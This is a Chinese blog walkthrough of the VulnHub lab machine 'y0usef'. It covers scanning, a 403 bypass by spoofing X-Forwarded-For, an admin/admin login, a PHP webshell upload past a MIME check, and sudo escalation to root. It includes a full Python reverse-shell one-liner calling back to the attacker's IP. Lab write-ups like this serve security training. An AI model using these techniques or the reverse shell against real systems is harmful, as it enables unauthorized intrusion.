kali之vulnhub,y0usef

最新推荐文章于 2024-04-02 09:34:33 发布
最新推荐文章于 2024-04-02 09:34:33 发布
阅读量562 收藏
点赞数
分类专栏: Vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54431413/article/details/124892112
版权

目录

地址:

一、主机发现

二、端口扫描

三、服务版本

四、信息收集

1.查看敏感文件

2.看源码

3.whatweb工具

4.dirsearch扫目录

 5.路径尝试

五、403 bypass

1.burp抓包

2.xff绕过

3.弱口令登录

 六、文件上传

 1.mine绕过

 2.得到路径

3.是否正常执行

 七、python反弹shell

 八、信息收集

1.查看/etc/passwd文件

2.查找user.txt文件

九、登录ssh

十、sudo提权

地址:

y0usef: 1 ~ VulnHubicon-default.png?t=M4ADhttps://www.vulnhub.com/entry/y0usef-1,624/#download

一、主机发现

sudo nmap -sn 192.168.43.27/24

二、端口扫描

sudo nmap -p- 192.168.43.20

三、服务版本

sudo nmap -p22,80 -sV -sC 192.168.43.20

unbuntu系统,开放22ssh服务,80端口http服务。

四、信息收集

1.查看敏感文件

如/robots.txt /admin /login

没有什么发现

2.看源码

找接口,或开发人员留下来的注释,没什么发现

3.whatweb工具

whatweb简介 whatweb是kali中网站指纹识别的工具,使用Ruby语言开发。whatweb可识别web技术,包括内容管理系统(CMS)、博客平台、统计/分析包、JavaScript库,Web服务器和嵌入式设备等

 whatweb http://192.168.43.20/ 

扫出来  bootstrap前端框架,query库,服务器apache ,php语言5.59,也没有什么可以利用的

4.dirsearch扫目录

dirsearch -u URL

403是forbid禁止,404未发现页面,301重定向,200状态正常

 5.路径尝试

200的都不行。和原来页面一样,网站正在建设中。

 301的也是forbidden了

五、403 bypass

1.burp抓包

2.xff绕过

request中X-forward-For头是用来保证真实ip的,在每经过一个代理转发后,就把ip加到X-forward-For上。这里我们可以伪造X-forward-For为127.0.0.1来欺骗服务器,是来自本地的请求。

X-Forwarded-For:127.0.0.1

3.弱口令登录

admin/admin

当然我们发送向服务器的每一个数据包都要伪造X-Forwarded-For

 六、文件上传

写一个简单的php命令执行的一句话木马,上传到服务器,之后用来反弹shell

 1.mine绕过

 2.得到路径

3.是否正常执行

 七、python反弹shell

目标靶机有python环境,所以用python反弹shell

将下列命令赋值给参数即可。

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.27",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

 八、信息收集

1.查看/etc/passwd文件

发现了几个能通过shell登录的用户,去他们的家目录下查看一下

2.查找user.txt文件

我们用find命令找到了user.txt文件,并且查看后发现这是一个不寻常的编码,可能是base64,所以我们进行了解密得到了ssh的一对用户名密码

九、登录ssh

利用所得密码和用户名成功登录

十、sudo提权

sudo可以执行所有命令,是所有,直接切换用户就ok

sudo su

切换用户后我们在root的家目录下发现了第二个flag

再来base64解下密,可以联系作者给些反馈feedback

 

 

梅_花_七
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机系列:pWnOS: 1.0
汗的博客
03-29 2470
https://www.hackingarticles.in/hack-the-pwnos-1-0-boot-to-root/ 文章目录靶机地址利用知识信息收集Getshell提权 靶机地址 https://www.vulnhub.com/entry/pwnos-10,33/ tip:如果Vmware在首次引导时询问您是复制还是移动了该虚拟机,请单击MOVED!否则,网络设置可能会混乱。 利用知识...
网络安全之配置Kali教程
12-23
kali安装 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来...
bypass-403:一个简单的脚本,仅供旁路403使用
04-13
旁通403 一个简单的脚本,仅供旁路403使用 它也可以用来比较各种条件下的响应,如下图所示 用法 ./bypass-403.sh https://example.com admin ./bypass-403.sh website-here path-here 特征 在卷曲的帮助下使用13个已知的403绕过 安装 git clone https://github.com/iamj0ker/bypass-403 cd bypass-403 chmod +x bypass-403.sh sudo apt install figlet如果您无法看到屏幕截图中的徽标 贡献者
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5352
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
深度解析:DirSearch Bypass403 - 突破Web目录权限限制的利器
gitblog_00090的博客
04-02 819
深度解析:DirSearch Bypass403 - 突破Web目录权限限制的利器 项目地址:https://gitcode.com/lemonlove7/dirsearch_bypass403 在网络安全和渗透测试领域, DirSearch 是一个广为人知的工具,用于枚举Web服务器上的潜在可访问目录。然而,当遇到403 Forbidden错误时,这种探测可能会受阻。为了解决这个问题,lemon...
目录扫描+JS文件中提取URL和子域+403状态绕过+指纹识别(dirsearch_bypass403)
Kris__zhang的博客
09-01 835
dirsearch进行目录扫描—>将所有403状态的目录进行保存–>是否进行jsfind–>是(进行js爬取url和域名,将爬取到的url进行状态码识别如果是403状态则进行保存)–>进行403绕过–>目录进行指纹识别。在安全测试时,安全测试人员信息收集中时可使用它进行目录枚举,目录进行指纹识别,枚举出来的403状态目录可尝试进行绕过,绕过403有可能获取管理员权限。对扫描出来的目录进行指纹识别(结果会自动保存在reports目录下的.josn文件中)对404状态码和0B数据进行过滤不进行指纹识别。
每周打靶VulnHub靶机-y0usef
m0_54178755的博客
10-05 111
每周打靶VulnHub靶机-y0usef
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
KALI渗透测试之密码破解
02-09
KALI渗透测试之密码破解篇章,详细介绍kali的密码破解工具使用。
Kali系列之workstations环境下安装kali.docx
12-06
Kali Linux是基于Debian GNU/Linux的企业级安全审计Linux发行版。Kali的目标用户是安全专业人员和IT管理员,其能够应用于高级渗透测试,取证分析和安全审计等领域。 Kali Linux预装了许多渗透测试软件,包括nmap 、...
kali 1800W超强字典
04-07
kali 1800W超强字典
403ByPass总结
LainWith的博客
08-17 8923
直接访问网站如下图,这里使用vulnhub靶机“Y0USEF: 1”为例,介绍几种403ByPass的手段。应该使用方法3探知网站,避免全程绕过导致渗透报告上少了漏洞一旦确认403 ByPass如果后期需要BP,直接采用方法3,或者直接方法2(关闭方法3的插件)如果后期不需要BP,直接方法1。...
403bypass插件-BurpSuite_403Bypasser(一)
siu~
08-23 1219
一个burpsuite扩展绕过403限制目录。通过使用PassiveScan(默认启用),每个403请求将被这个扩展自动扫描,所以只需添加到burpsuite并享受。
vulnhub-y0usef
m0_62008601的博客
09-18 384
简单的渗透练习
burpsuit常用插件汇总
Thunderclap的博客
07-02 8850
burpsuit常用插件
Vulnhub--y0usef
weixin_45168704的博客
06-15 193
y0usef
目录扫描+JS中提取URL和子域+403状态绕过+指纹识别
Kris__zhang的博客
05-06 640
安全工具开发|目录扫描器dirsearch添加403绕过
vulnhub:Y0USEF
cjstang的博客
06-26 843
OSCP-4,主要利用方式:403请求绕过+文件上传绕过+RCE反弹shell 靶场: vulnhub.com 靶机名称: Y0USEF:1 难度: 中等
kali linux 无wlan0
07-25
如果在Kali Linux中没有wlan0接口,可能有几个可能的原因: 1. 驱动程序问题:首先,确认你的无线网卡是否被正确识别并安装了相应的驱动程序。你可以使用命令`lspci`或`lsusb`来查看你的网卡型号,并在互联网上搜索...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值